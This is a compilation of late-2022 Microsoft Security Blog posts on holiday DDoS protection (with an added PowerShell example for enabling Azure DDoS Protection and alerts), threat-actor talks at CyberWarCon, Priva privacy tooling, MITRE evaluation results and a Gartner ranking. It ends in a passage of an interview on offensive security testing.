While DDoS attacks happen all year round, the holidays are one of the most popular times and where some of the most high-profile attacks occur. Last October in India, there was a 30-fold increase in DDoS attacks targeting services frequently used during the festive season, including media streaming, internet phone services, and online gaming.[1] Last October through December, Microsoft mitigated several large-scale DDoS attacks, including one of the largest attacks in history from approximately 10,000 sources spanning multiple countries.[2]

Bar chart showing the number of DDoS attacks and duration distribution from March 2021-May 2022.
Figure 1. Number of DDoS attacks and duration distribution[3]

While retail and gaming companies are the most targeted during the holidays, organizations of all sizes and types are vulnerable to DDoS attacks. It’s easier than ever to conduct an attack. For only $500, anyone can pay for a DDoS subscription service to launch a DDoS attack. Every year, DDoS attacks are also becoming harder to protect against as new attack vectors emerge and cybercriminals leverage more advanced techniques, such as AI-based attacks.

With the holidays coming up, we’ve prepared this guide to provide you with an overview of DDoS attacks, trends we are seeing, and tips to help you protect against DDoS attacks.

What is a DDoS attack and how does it work?

A DDoS attack targets websites and servers by disrupting network services and attempting to overwhelm an application’s resources. Attackers flood a site or server with large amounts of traffic, resulting in poor website functionality or knocking it offline altogether. DDoS attacks are carried out by individual devices (bots) or a network of devices (a botnet) that have been infected with malware and are used to flood websites or services with high volumes of traffic. DDoS attacks can last a few hours, or even days.

What are the motives for DDoS attacks?

There is a wide range of motives behind DDoS attacks, including financial, competitive advantage, or political. Attackers will hold a site’s functionality hostage, demanding payment to stop the attacks and get sites and servers back online. We’re seeing a rise in cybercriminals combining DDoS attacks with other extortion attacks like ransomware (known as triple extortion ransomware) to apply more pressure and command higher payouts. Politically motivated attacks, also known as “hacktivism”, are becoming more commonly used to disrupt political processes. At the start of the war in Ukraine earlier in 2022, the Ukrainian government reported the worst DDoS attack in history as attackers aimed to take down bank and government websites.[4] Also, cybercriminals will often use DDoS attacks as a distraction for more sophisticated targeted attacks, including malware insertion and data exfiltration.

Why are DDoS attacks so common during the holidays?

Organizations typically have reduced resources dedicated to monitoring their networks and applications—providing easier opportunities for threat actors to execute an attack. Traffic volume is at an all-time high, especially for e-commerce websites and gaming providers, making it harder for IT staff to distinguish between legitimate and illegitimate traffic. For attackers seeking financial gain, the opportunity for more lucrative payouts can be higher during the holidays as revenues are at the highest and service uptime is critical. Organizations are more willing to pay to stop an attack to minimize loss of sales, customer dissatisfaction, or damage to their reputation.

Why protect yourself from DDoS attacks?

Any website or server downtime during the peak holiday season can result in lost sales and customers, high recovery costs, or damage to your reputation. The impact is even more significant for smaller organizations as it is harder for them to recover from an attack. Beyond the holidays when traffic is traditionally the highest, ongoing protection is also important. In 2021, the day with the most recorded attacks was August 10, indicating that there could be a shift toward year-round attacks2.

Tips for protecting and responding against DDoS attacks

  1. Don’t wait until after an attack to protect yourself. While you cannot completely avoid being a target of a DDoS attack, proactive planning and preparation can help you more effectively defend against an attack.
    • Identify the applications within your organization that are exposed to the public internet and evaluate potential risks and vulnerabilities.
    • It’s important that you understand the normal behavior of your application so that you’re prepared to act if the application is not behaving as expected. Azure provides monitoring services and best practices to help you gain insights on the health of your application and diagnose issues.
    • We recommend running attack simulations to test how your services will respond to an attack. You can simulate a DDoS attack on your Azure environment with services from our testing partners—BreakingPoint Cloud and RedButton.
  2. Make sure you’re protected. With DDoS attacks at an all-time high during the holidays, you need a DDoS protection service with advanced mitigation capabilities that can handle attacks at any scale.
    • We recommend enabling Azure DDoS Protection, which provides always-on traffic monitoring to automatically mitigate an attack when detected, adaptive real time tuning that compares your actual traffic against predefined thresholds, and full visibility on DDoS attacks with real-time telemetry, monitoring, and alerts.
    • Azure DDoS Protection should be enabled for virtual networks with applications exposed over the public internet. Resources in a virtual network that require protection against DDoS attacks include Azure Application Gateway, Azure Load Balancer, Azure Virtual Machines, and Azure Firewall.
    • For comprehensive protection against different types of DDoS attacks, set up a multi-layered defense by deploying Azure DDoS Protection with Azure Web Application Firewall (WAF). Azure DDoS Protection protects the network layer (Layer 3 and 4), and Azure WAF protects the application layer (Layer 7). You receive a discount on Azure WAF when deploying DDoS Network Protection along with Azure WAF, helping to reduce costs.
    • Azure DDoS Protection identifies and mitigates DDoS attacks without any user intervention. To get notified when there’s an active mitigation for a protected public IP resource, you can configure alerts.
  3. Create a DDoS response strategy. Having a response strategy is critical to help you identify, mitigate, and quickly recover from DDoS attacks. A key part of the strategy is a DDoS response team with clearly defined roles and responsibilities. This DDoS response team should understand how to identify, mitigate, and monitor an attack and be able to coordinate with internal stakeholders and customers. We recommend using simulation testing to identify any gaps in your response strategy.
  4. Reach out for help during an attack. If you think you are experiencing an attack, you should reach out to the appropriate technical professionals for help. Azure DDoS Protection customers have access to the DDoS Rapid Response (DRR) team, who can help with attack investigation during an attack as well as post-attack analysis. Check out this guide for more details on when and how to engage with the DRR team during an active attack.
  5. Learn and adapt after an attack. While you’ll likely want to move on as quickly as possible if you’ve experienced an attack, it’s important to continue to monitor your resources and conduct a retrospective after an attack. You should apply any learnings to improve your DDoS response strategy.
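As an added example (not code from the Microsoft post), tips 1 and 2 applied to an Azure environment with the Az PowerShell module: attach a DDoS protection plan to the virtual network that fronts the public application, and raise a metric alert to the response team when Azure is actively mitigating an attack on a protected public IP. The resource group, VNet, public IP, action group and e-mail address are assumed names.

```powershell
# Added example, not from the Microsoft post: enable Azure DDoS Protection on a VNet and
# alert on active mitigation of a protected public IP, using the Az PowerShell module.
# Every resource name below is an assumption; replace with your own.
$rg       = "rg-holiday-shop"      # assumed resource group
$location = "eastus"
$vnetName = "vnet-shop-prod"       # assumed VNet fronting the public application
$pipName  = "pip-shop-appgw"       # assumed public IP of the Application Gateway

# 1. Create a DDoS protection plan and attach it to the VNet; every public IP in the VNet is then covered.
$plan = New-AzDdosProtectionPlan -ResourceGroupName $rg -Name "ddos-plan-prod" -Location $location
$vnet = Get-AzVirtualNetwork -ResourceGroupName $rg -Name $vnetName
$vnet.DdosProtectionPlan = New-Object Microsoft.Azure.Commands.Network.Models.PSResourceId
$vnet.DdosProtectionPlan.Id = $plan.Id
$vnet.EnableDdosProtection = $true
$vnet | Set-AzVirtualNetwork | Out-Null

# 2. Action group that notifies the DDoS response team (tip 3: known contacts before an attack).
$receiver = New-AzActionGroupReceiver -Name "ddos-oncall" -EmailReceiver -EmailAddress "ddos-oncall@example.com"
$ag = Set-AzActionGroup -ResourceGroupName $rg -Name "ag-ddos-response" -ShortName "ddosresp" -Receiver $receiver

# 3. Metric alert: IfUnderDDoSAttack is 1 while Azure is mitigating an attack on the public IP
#    (tip 2, last bullet: get notified when there is an active mitigation).
$pip = Get-AzPublicIpAddress -ResourceGroupName $rg -Name $pipName
$criteria = New-AzMetricAlertRuleV2Criteria -MetricName "IfUnderDDoSAttack" `
    -TimeAggregation Maximum -Operator GreaterThan -Threshold 0
Add-AzMetricAlertRuleV2 -ResourceGroupName $rg -Name "alert-ddos-mitigation-active" `
    -TargetResourceId $pip.Id -Condition $criteria -ActionGroupId $ag.Id `
    -WindowSize 00:05:00 -Frequency 00:01:00 -Severity 1 `
    -Description "Azure DDoS mitigation active on $pipName"

# 4. Verify the VNet is now protected (tip 1: know your exposure before the holidays).
(Get-AzVirtualNetwork -ResourceGroupName $rg -Name $vnetName).EnableDdosProtection
```

Run it in a session already signed in with Connect-AzAccount and the target subscription selected; the final line prints True when the plan is attached.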

Azure offers cloud native, Zero Trust based network security solutions to protect your valuable resources from evolving threats. Azure DDoS Protection provides advanced, cloud-scale protection to defend against the largest and most sophisticated DDoS attacks.

Don’t let DDoS attacks ruin your holidays! Prepare for the upcoming holiday season with this guide and make sure Azure DDoS Protection is at the top of your holiday shopping list.


1Thirty-fold increase in DDoS cyber attacks in India in festive season, CIO News, ET CIO (

2Azure DDoS Protection—2021 Q3 and Q4 DDoS attack trends

3Microsoft Digital Defense Report 2022

4Ukraine says it suffered worst DDoS Attack in Standoff

Additional resources

Azure DDoS Protection reference architectures

Components of a DDoS response strategy

Azure DDoS Protection fundamental best practices

Azure network security resources

The post 2022 holiday DDoS protection guide appeared first on Microsoft Security Blog.

Microsoft threat intelligence presented at CyberWarCon 2022 

At CyberWarCon 2022, Microsoft and LinkedIn analysts presented several sessions detailing analysis across multiple sets of actors and related activity. This blog is intended to summarize the content of the research covered in these presentations and demonstrates Microsoft Threat Intelligence Center’s (MSTIC) ongoing efforts to track threat actors, protect customers from the associated threats, and share intelligence with the security community.

The CyberWarCon sessions summarized below include:

  • “They are still berserk: Recent activities of BROMINE” – a lightning talk covering MSTIC’s analysis of BROMINE (aka Berserk Bear), recent observed activities, and potential changes in targeting and tactics.
  • “The phantom menace: A tale of Chinese nation-state hackers” – a deep dive into several of the Chinese nation-state actor sets, their operational security patterns, and case studies on related tactics, techniques, and procedures (TTPs).
  • “ZINC weaponizing open-source software” – a lightning talk on MSTIC and LinkedIn’s analysis of ZINC, a North Korea-based actor. This will be their first public joint presentation, demonstrating collaboration between MSTIC and LinkedIn’s threat intelligence teams.

MSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections and improve customer protections. As with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as temporary names for unknown, emerging, or developing clusters of threat activity, allowing MSTIC to track each as a unique set of information until we reach high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.

They are still berserk: Recent activities of BROMINE

BROMINE overlaps with the threat group publicly tracked as Berserk Bear. In our talk, MSTIC provided insights into the actor’s recent activities observed by Microsoft. Some of the recent activities presented include:

  • Targeting and compromise of dissidents, political opponents, Russian citizens, and foreign diplomats. These activities have spanned multiple methods and techniques, ranging from the use of a custom malicious capability to credential phishing leveraging consumer mail platforms. In some cases, MSTIC has identified the abuse of Azure free trial subscriptions and worked with the Azure team to quickly take action against the abuse.
  • Continued targeting of organizations in the manufacturing and industrial technology space. These sectors have been continuous targets of the group for years and represent one of the most durable interests.
  • An opportunistic campaign focused on exploiting datacenter infrastructure management interfaces, likely for the purpose of access to technical information of value.
  • Targeting and compromise of diplomatic sector organizations focused on personnel assigned to Eastern Europe.
  • Compromise of a Ukrainian nuclear safety organization previously referenced in our June 2022 Special Report on Defending Ukraine (

Overall, our findings continue to demonstrate that BROMINE is an elusive threat actor with a variety of potential objectives, yet sporadic insights from various organizations, including Microsoft, demonstrate there is almost certainly more to find. Additionally, our observations show that as a technology platform provider, threat intelligence enables Microsoft’s ability to protect both enterprises and consumers and disrupt threat activity affecting our customers.

The phantom menace: A tale of China-based nation state hackers

Over the past few years, MSTIC has observed a gradual evolution of the TTPs employed by China-based threat actors. At CyberWarCon 2022, Microsoft analysts presented their analysis of these trends in Chinese nation-state actor activity, covering:

  • Information about new tactics that these threat actors have adopted to improve their operational security, as well as a deeper look into their techniques, such as leveraging vulnerable SOHO devices for obfuscating their operations.
  • Three different case studies, including China-based DEV-0401 and nation-state threat actors GALLIUM and DEV-0062, walking through (a) the initial vector (compromise of public-facing application servers, with the actors showing rapid adoption of proofs of concept for vulnerabilities in an array of products), (b) how these threat actors maintained persistence on the victims (some groups dropping web shells, backdoors, or custom malware), and (c) the objectives of their operations: intelligence collection for espionage.
  • A threat landscape overview of the top five industries that these actors have targeted—governments worldwide, non-government organizations (NGOs) and think tanks, communication infrastructure, information technology (IT), and financial services—displaying the global nature of China’s cyber operations in the span of one year.

As demonstrated in the presentation, China-based threat actors have targeted entities nearly globally, employing techniques and using different methodologies to make attribution increasingly harder. Microsoft analysts assess that China’s cyber operations will continue to move along their geopolitical agenda, likely continuing to use some of the techniques mentioned in the presentation to conduct their intelligence collection. The graphic below illustrates how quickly we observe China-based threat actors and others exploiting zero-day vulnerabilities and then those exploits becoming broadly available in the wild.

Chart showing that after a vulnerability is publicly disclosed, it takes only 14 days on average for an exploit to be available in wild, 60 days for POC code to be released on GitHub, and 120 days for the exploit to be available in scanning tools.
Figure 1. The speed and scale of vulnerability exploitation. Image source: Microsoft Digital Defense Report 2022

ZINC weaponizing open-source software

In this talk, Microsoft and LinkedIn analysts detailed recent activity of a North Korea-based nation-state threat actor we track as ZINC. Analysts detailed the findings of their investigation (previously covered in this blog) and walked through the series of observed ZINC attacks that targeted 125 different victims spanning 34 countries, noting the attacks appear to be motivated by traditional cyber-espionage and theft of personal and corporate data. A few highlights include:

  • In September 2022, Microsoft disclosed detection of a wide range of social engineering campaigns using weaponized legitimate open-source software. MSTIC observed activity targeting employees in organizations across multiple industries including media, defense and aerospace, and IT services in the US, UK, India, and Russia.
  • Based on the observed tradecraft, infrastructure, tooling, and account affiliations, MSTIC attributes this campaign with high confidence to ZINC, a state-sponsored group based out of North Korea with objectives focused on espionage, data theft, financial gain, and network destruction.
  • When analyzing the data from an industry sector perspective, we observed that ZINC chose to deliver malware most likely to succeed in a specific environment, for example, targeting IT service providers with terminal tools and targeting media and defense companies with fake job offers to be loaded into weaponized PDF readers.
  • ZINC has successfully compromised numerous organizations since June 2022, when the actor began employing traditional social engineering tactics by initially connecting with individuals on LinkedIn to establish a level of trust with their targets.
  • Upon successful connection, ZINC encouraged continued communication over WhatsApp, which acted as the means of delivery for their malicious payloads. MSTIC observed ZINC weaponizing a wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for these attacks. ZINC was observed attempting to move laterally across victim networks and exfiltrate collected information from.

Diagram showing end-to-end attack chain of a ZINC attack, from initial compromise and execution, to persistence, command and control, discovery, and collection
Figure 2. ZINC attack chain. Read more in our detailed blog: ZINC weaponizing open-source software.

As the threat landscape continues to evolve, Microsoft strives to continuously improve security for all, through collaboration with customers and partners and by sharing our research with the larger security community. We would like to extend our thanks to CyberWarCon and LinkedIn for their community partnership.

The post Microsoft threat intelligence presented at CyberWarCon 2022 appeared first on Microsoft Security Blog.

Simplify privacy protection with Microsoft Priva Subject Rights Requests

November 10th, 2022 No comments

The General Data Protection Regulation (GDPR) came into effect in 2018 and set a new standard for the level of control individuals in the European Union had on the personal data they shared online. Since then, the number of privacy regulations around the world has flourished and impacted the privacy landscape we see today. According to Gartner®, by the end of 2024, three-quarters of the world’s population will have its personal data covered by modern privacy regulations.1 Today, additional regulations like the California Consumer Privacy Act (CCPA) and Brazil’s Lei Geral de Proteção de Dados (LGPD) empower people to exercise their right to request the personal data that organizations have collected from them.

When organizations respond to subject rights requests, they are both meeting their regulatory requirements and providing people with control over their personal data. Although responding to requests can be quite complex, Microsoft Priva Subject Rights Requests can help ease the process—and with the preview arrival of Right to be Forgotten, Priva Subject Rights Requests can further support how organizations respect the privacy of their customers and employees.

Understanding how people think about privacy

As many businesses around the world adapt their privacy practices, having both the tools that help address privacy requirements and a good understanding of how consumers perceive and feel about privacy are key to enabling trust with customers. Microsoft Priva, the brand category for Microsoft Security, was announced at Microsoft Ignite in 2021 by Vasu Jakkal, Corporate Vice President of Microsoft Security, Compliance, and Identity.2 Priva solidified our commitment to supporting organizations in their privacy journey with products that help safeguard personal data and manage subject rights requests at scale. For organizations, having processes that help manage their privacy is critical, but it is also valuable to have a deep understanding of how people really think about privacy to guide their practices. We recently commissioned privacy research that explores the emotional textures of privacy and what triggers privacy vulnerability. We learned that when businesses empathize with the privacy concerns people have and transparently address them, they foster trust and differentiate themselves from competitors.

It’s important for organizations to assess the varying causes that spark privacy vulnerability for both their consumers and their business. For example, a consumer may feel anxious or helpless because they don’t know how their personal data is being used. However, if they are provided with transparency of how their data is being used and given clear options that enable the control of their data, their insecurities could be eased and trust in the process earned. For a business, privacy vulnerability could present itself through limited transparency or basic compliance—leaving room for privacy risk to potentially unfold. For instance, a business that might fulfill a data subject request unconvincingly, or with basic effort, could be managing its privacy at a vulnerable level. If that business were to practice a “beyond-compliance,” human-centered privacy approach, they could yield practices that help them build privacy resilience—helping them stand apart from their competitors while they earn trust from their customers.

Gradient scale bar showing Privacy vulnerable on one end and Privacy resilient on the other. The scale is from the consumer perspective and the business perspective.

Figure 1. The differing perspectives of consumers and businesses regarding privacy vulnerability versus privacy resilience.

The above figure demonstrates a privacy scale ranging from vulnerable to resilient and includes both consumer and business perspectives. On the consumer side, it ranges from feeling anxious, helpless, and lacking knowledge or motivation in protective coverage to secure, being in control, trusting the process, and being skilled in protective coverage. On the business side, it ranges from basic compliance, limited transparency, minimal control, and reactive approaches to beyond compliance, authentic privacy care, reciprocating data for value, and a proactive approach to consumer protection.

Microsoft Priva Subject Rights Requests can help

Many times, even though an organization may be focused on a proactive privacy approach, managing and responding to subject rights requests can be a tedious and cumbersome process. It can be extremely time-consuming and taxing as they are also time-bound, bringing extra complexity to the organization. Responding to these requests often requires a tremendous amount of collaboration and manual review, and producing just a single request can be quite expensive. Nonetheless, completing these requests is not just an obligatory requirement, but also a tangible way that expresses respect for customer and employee privacy.

Priva helps organizations more efficiently manage requests at scale—Priva Subject Rights Requests automates the search and collection of content relevant to the data subject and facilitates tasks such as in-line review, redaction, and collaboration, all from an easy-to-use dashboard. Admins can easily get started by leveraging request templates that help them create requests with recommended default configurations and use Microsoft Power Automate integration, as well as API support to better fit into their existing processes.

Priva Subject Rights Requests dashboard, showing detailed insights for subject rights requests: including active, closed and overdue requests, as well as a circle and line graph showing status of requests and request types.

Figure 2. Priva Subject Rights Requests overview dashboard showing insights.

Priva Subject Rights Requests help admins meet the strict deadlines associated with regulations like GDPR and ease the administrative burden of tedious tasks related to collection, review, and redaction. Completing a request also often requires teamwork from various departments within the organization. Priva provides secure collaboration through Microsoft Teams and keeps a history tab, highlighting actions taken from all collaborators for easy auditing—streamlining the complexity of requests from beginning to post-completion.

Microsoft Priva Subject Rights Requests highlights:

  • Automates discovery: Gathers the requestor’s personal information and detects data conflicts such as sensitive information or data pertaining to other users.
  • In-place review and secure collaboration: Review files in place in their native views, perform redactions in-line with built-in tools, and consolidate collaboration within a protected platform.
  • Ecosystem integration: Plugs into an organization’s existing process to manage requests in a unified way across the digital estate. Microsoft Graph subject rights requests API integrates Priva Subject Rights Requests with in-house or partner-built privacy solutions.

The newest Priva Subject Rights Requests update, Right to be Forgotten, is here

Delete request type option selected under the “Select the type of request” menu from the Priva Subject Rights Requests custom request creation process.

Figure 3. Admins can select delete as a request type on Priva Subject Rights Requests.

Both GDPR and CCPA include the Right to be Forgotten, giving people the ability to request the deletion of all the information an organization has collected about them, with a few outlined exceptions that allow data retention. For example, a former employee in an EU-based company believes she left documents containing her personal data in SharePoint. The employee can exercise her right to her personal data and make a subject rights request for deletion with that organization. As Priva Subject Rights Requests continues to evolve, we are excited to share the preview release of Right to be Forgotten, helping organizations meet requests such as the employee’s request for deletion.

This marks a significant update for Priva Subject Rights Requests as with this new feature, admins can now select delete as a request type, or get started with the delete template and get purpose-built flows that help surface conflicts and streamline deletion—leveraging the Microsoft retention and deletion platform and working better together with teams already using data lifecycle management and records management. This feature will also enable admins to have the flexibility to select different approvers for any given request and, once the workflow is complete, access to the reports tab where they can view their summary report and review results.

Sample delete request for employee in stage 3 of 5, where the designated approver is to complete approval to proceed to stage 4 of 5.

Figure 4. Delete request in the approval stage, showcasing approver details and the complete approval button.

Learn more

Although completing subject rights requests can be complex, Microsoft Priva Subject Rights Requests can help ease the process. As organizations continue to adapt to the privacy changes that impact their customers and their business, we are reminded that although changes to the privacy landscape are inevitable, there are resources to support these shifts. We invite you to learn more about Priva Subject Rights Requests by downloading our free eBook and encourage you to try Microsoft Priva Subject Rights Requests free trial today.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

1State of Privacy: The Privacy Tech Driving a New Age of Data Wealth, Gartner®. August 2022.

2Protect your business with Microsoft Security’s comprehensive protection, Vasu Jakkal, Microsoft Security. November 2, 2021.

The post Simplify privacy protection with Microsoft Priva Subject Rights Requests appeared first on Microsoft Security Blog.

Categories: cybersecurity, Data Protection, privacy

Microsoft Defender Experts for Hunting demonstrates industry-leading protection in the 2022 MITRE Engenuity ATT&CK® Evaluations for Managed Services

November 9th, 2022 No comments

Microsoft Defender Experts for Hunting, our newest managed threat hunting service, delivered industry-leading results during the inaugural MITRE Engenuity ATT&CK® Evaluations for Managed Services.

We provided a seamless, comprehensive, and rapid response to the simulated attack using expert-led threat hunting and an industry-leading extended detection and response (XDR) platform—Microsoft 365 Defender. This evaluation showcased our service’s strength in the following areas:

  • In-depth visibility and analytics across all stages of the attack chain.
  • Comprehensive managed hunting.
  • Seamless alert prioritization and consolidation into notifications for the security operations center (SOC).
  • Tailored hunting guidance and advanced hunting queries (AHQ) to optimize investigations.
  • Frequently updated and customized recommendations for rapid containment and remediation.
  • Threat actor attribution with tactics, techniques, and procedures (TTP) context.
  • Technology powered by a team of expert hunters and a customer-centric approach.
  • Commitment to managed extended detection and response (MXDR) partners running on Microsoft 365 Defender.

In-depth visibility and analytics across all stages of the attack chain

Diagram representing a snake of how we represented the MITRE attack and our coverage.

Figure 1. Microsoft Defender Experts for Hunting coverage. Fully reported—including initial access, execution, persistence, credential access, lateral movement, and collection—reflects 100 percent acceptance of evidence submission. Majority reported—including defense evasion, discovery, exfiltration, and command and control—reflects some gaps in evidence acceptance.

Comprehensive managed hunting

The Microsoft Defender Experts for Hunting team identified all threats and provided a cohesive attack timeline with remediation guidance.

From the early stages of the intrusion, our hunters alerted the customer that a malicious archive masquerading as marketing materials was potentially part of a targeted attack. After a user opened the archive, a threat actor, which we attributed with high confidence as EUROPIUM, gained access to the environment.

Over the next few days, the threat actor used this foothold to steal credentials, move laterally in the network, deploy a web shell on an Exchange Server, and escalate privileges in the domain. The threat actor ultimately used their access to target sensitive data on an SQL server. Based on available telemetry, we reported that the threat actor staged sensitive data and may have successfully exfiltrated the data through email using a malicious RDAT utility.

Bar chart showing results of Microsoft against all other vendors participating in this evaluation.

Figure 2. Microsoft results compared to all other vendors out of 76 total techniques.

Microsoft threat hunters discovered and investigated all of the essential and impactful TTPs used in this evaluation.

Seamless alert prioritization and consolidation into notifications for the SOC

From initial malware execution to data theft, Microsoft 365 Defender seamlessly detected and correlated alerts from all stages of the attack chain into two overarching incidents that provided end-to-end attack stories (see Figure 3). Microsoft 365 Defender’s incident correlation technology helps SOC analysts to counter alert fatigue, and our hunters then enrich these incidents by finding new attacks with the existing deep signals and custom alerting.

Two Incidents identified and enriched by our Defender Experts for Hunting Team.

Figure 3. Consolidated incidents enriched by Defender Experts for Hunting as illustrated in the above tags.

Our hunters followed up on automated alerting with Defender Expert notifications (DENs) to provide additional context on the threat activity with an executive summary, threat actor attribution, detailed scope of impact, recommendations, and advanced hunting queries to self-serve investigations and response actions. This human enrichment helps the customer prioritize their time and focused actions in the SOC.

Custom advanced hunting queries provided by our Defender Experts for Hunting Team in Microsoft 365 Defender.

Figure 4. Beginning of incident executive summary provided by Defender Experts.

Tailored hunting guidance and AHQ to optimize investigations

Within the DENs, our hunters additionally provided tailored hunting guidance and AHQs to enable investigators to hunt for and identify relevant attack activity in each incident. Figure 5 shows one example where we directly flagged to the customer that a series of file modification events were consistent with data exfiltration attempts.

Custom advanced hunting queries provided by our Defender Experts for Hunting Team in M365D.

Figure 5. Example of running provided AHQs to surface activity of interest.

Frequently updated and customized recommendations for containment and remediation

Throughout the attack, our hunters regularly shared remediation guidance to aid the customer in a rapid response (Figure 6). As the incident developed, using the Recommendation Summary, we kept the customer apprised of the scope of the attack and the efforts needed to contain it.

Recommendations for remediation provided by our Defender Experts for Hunting Team.

Figure 6. Excerpt of custom recommendations in the Microsoft 365 Defender portal.

Threat actor attribution with TTP context

Microsoft Defender Experts for Hunting provided the customer with nation-state attribution based on observed TTPs and behaviors. We identified the activity was consistent with the threat actor EUROPIUM, also known as APT34 and OilRig, which Microsoft has observed as far back as 2015. EUROPIUM is a well-resourced actor capable of multiple types of attacks—from spear phishing and social engineering to remote exploitation of internet-facing devices.

We leveraged this attribution to provide valuable incident context, such as potential intrusion goals and relevant TTPs, to the customer.

Nation state attribution of this attack by Defender Experts for Hunting Team.

Figure 7. Incident attribution in Microsoft 365 Defender portal.

Technology powered by a team of expert hunters

The Microsoft philosophy in this evaluation was to represent product truth and real-world service delivery for our customers. We participated in the evaluation using our Defender Experts for Hunting team and product capabilities and configurations that we expect customers to use. As you review evaluation results, you should consider additional aspects including depth and durability of protection, completeness of signals, actionable insights, and the quality of what our hunters provided to enrich both the incidents and component alerts. All of these factors are critical in delivering a world-class hunting service to protect real customer production environments.

Commitment to MXDR partners running on Microsoft 365 Defender

Microsoft supported several of our verified MXDR partners in this evaluation. Our collaborative efforts reinforce our commitment to our partners’ success in building managed services to meet growing demand and support our joint customers.

We thank MITRE Engenuity for the opportunity to contribute to and participate in this year’s evaluation.

The MITRE Engenuity ATT&CK Evaluations Managed Services OilRig 2022 participant badge.

Read more about the MITRE Managed Services Evaluations.

Learn more

Learn more about Microsoft Defender Experts for Hunting.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

© November 2022 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.

The post Microsoft Defender Experts for Hunting demonstrates industry-leading protection in the 2022 MITRE Engenuity ATT&CK® Evaluations for Managed Services appeared first on Microsoft Security Blog.

Microsoft named a Leader in 2022 Gartner® Magic Quadrant™ for Access Management for the 6th year

November 4th, 2022 No comments

We are honored to announce that Microsoft has been named a Leader in the 2022 Gartner® Magic Quadrant™ for Access Management for Microsoft Azure Active Directory (Azure AD), part of Microsoft Entra.

Gartner Magic Quadrant graphic showing Microsoft positioned in the top right hand quadrant as a Leader.

We thank our customers who guide our strategy and product innovation, engage with us deeply in co-creating modern and secure identity solutions, and provide invaluable feedback that helps us continually raise the bar. We believe this incredible partnership has propelled us to be recognized as a Leader for the 6th year in a row and inspires us to grow our product portfolio, introducing innovative solutions so that our customers can do more with less.

Secure access for a connected world

As organizations have adopted new technologies to expand their digital environments, managing identities and access has become much more complex and time-consuming. To innovate without fear, organizations must ensure that they effectively protect their expanding digital estate as every new service immediately becomes a new attack surface. That’s why we’re building our identity solution as a pervasive trust fabric that can secure access to everything for everyone, whether that be within on-premises, Azure, Amazon Web Services, Google Cloud Platform, apps, websites, devices, or wherever organizations expand next.

To pave the way for the next generation of identity solutions, earlier this year we announced Microsoft Entra, our new identity and access product family that can help any organization:

  • Protect access to every app and every resource for every user.
  • Effectively secure every identity including employees, customers, partners, apps, devices, and workloads across every environment.
  • Discover and right-size permissions, manage access lifecycles, and ensure least privilege access for any identity.
  • Keep users productive with simple sign-in experiences, intelligent security, and unified administration.

Discover the Microsoft Entra product family

Following our identity innovations announced at Microsoft Ignite 2022, the Microsoft Entra product family includes:

Learn more

You can learn more by reading the full 2022 Gartner® Magic Quadrant™ for Access Management report. To learn more about the Microsoft Entra portfolio and its products, visit our website and check out our Ignite session covering our recent Microsoft Entra innovations.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Microsoft.

Gartner does not endorse any vendor, product, or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Gartner and Magic Quadrant are registered trademarks and service marks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.

Gartner, Magic Quadrant for Access Management, By Henrique Teixeira, Abhyuday Data, Michael Kelley, James Hoover, Brian Guthrie. 2 November 2022.

The post Microsoft named a Leader in 2022 Gartner® Magic Quadrant™ for Access Management for the 6th year appeared first on Microsoft Security Blog.

Identifying cyberthreats quickly with proactive security testing

November 3rd, 2022 No comments

The security community is continuously changing, growing, and learning from each other to better position the world against cyberthreats. In the latest post of our Community Voices blog series, Microsoft Security Senior Product Marketing Manager Brooke Lynn Weenig talks with Matthew Hickey, Co-founder, Chief Executive Officer (CEO), and hacker of Hacker House. The thoughts below reflect Matthew’s views, not the views of Matthew’s employer, and are not legal advice. In this blog post, Matthew talks about application security.

Brooke: How did you get into cybersecurity?

Matthew: If your dad is a car mechanic, you grow up learning about cars. During the 1980s, my dad was super into computers. He used to go to my grandma’s school and bring home the computers prior to anyone really understanding what they were. These were the filing cabinet days and the days of carbon paper. Only very academic people and fringe technologists were interested in cybersecurity. When I was in high school, I had networks in my house with networked games. I started picking apart how the phone network worked and how internet access worked. My dad was supportive. He said, “If a 13-year-old kid can break into it, maybe we should not be using it.”

I pushed hard to get myself in front of as many people as I could and ended up working for a group from the National Computing Center. They had begun selling cybersecurity assurance services and penetration testing. I built a portfolio of my work publishing papers and showing people how computer systems were broken and how you could hack into them. At the time, you could not go to college and do cybersecurity. I dealt with a lot of rejection letters and a lot of people saying no and then I got my first job—that was 20 years ago. Now, I run my own company and I have written a book on the subject.

Brooke: What is most fascinating to you about cybersecurity?

Matthew: For me, it is the exciting element of offensive security testing. I take a low-privileged user on the system and say, “I want to make this user become a high-privileged user without authorization” and I will poke and probe my way through the system, testing all the boundaries and controls in place until I find ways to break it.

I began on an interesting journey; looking at things like state machines, where a computer will go through a lifecycle of a connection. When you connect your system to a server in the office, the computer will keep track of different states. For example, “Did you enter the right password?” and “Should it give you access?” I find these kinds of problems intellectually challenging and quite enjoyable.

Brooke: How do you help clients define and set goals for security control?

Matthew: There is a saying that this industry is run on fear, uncertainty, and doubt. I often ask clients: “If a hacker broke in tomorrow and had free rein of all your systems, what are you most concerned about?” We identify all the assets in the environment and their sensitive data and then review controls based on their concerns. Usually, they are most concerned about payment information and commercially sensitive information, or they are storing things that they perhaps should not have been storing, including credit card data and anything that could cause brand reputational damage.

